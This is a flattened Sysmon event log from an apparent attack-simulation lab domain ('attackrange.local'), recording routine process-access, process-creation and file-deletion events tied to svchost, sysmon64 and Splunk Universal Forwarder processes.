07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4B9-60EB-7579-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4B9-60EB-7579-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.492{0C1E0330-F4B9-60EB-7579-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:25.409{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64ED137E9342EE10058A1B5C84F3D6B,SHA256=6AF8C71C30F7D1D31792AB9C22CBC5ECF1DC5FD025D2374D26614D3C7B71BAD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.850{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4BA-60EB-7779-00000000D001}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4BA-60EB-7779-00000000D001}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4BA-60EB-7779-00000000D001}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-F4BA-60EB-7779-00000000D001}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.647{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4FD25D27289975EF4D7878E9A93FEBB,SHA256=10CF2EEE0A945C5978E166316B1CD40779EC25C514BA1AD33A827D284005AB9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92708BF4F1E2A2F8720BF51F039B46F1,SHA256=5CEA1492B5CFEE687E8355BF687EE6466E2CCFA3DBB689A59E54D00A2E411D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:26.424{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FCDAA41136586C4A41ADFAB6D1DD382,SHA256=E316B2BFA146249E281CD53BD16C391AAF5719DBC5B4A3EB17D776FC4EB5545E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.178{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4BA-60EB-7679-00000000D001}1504C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.178{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 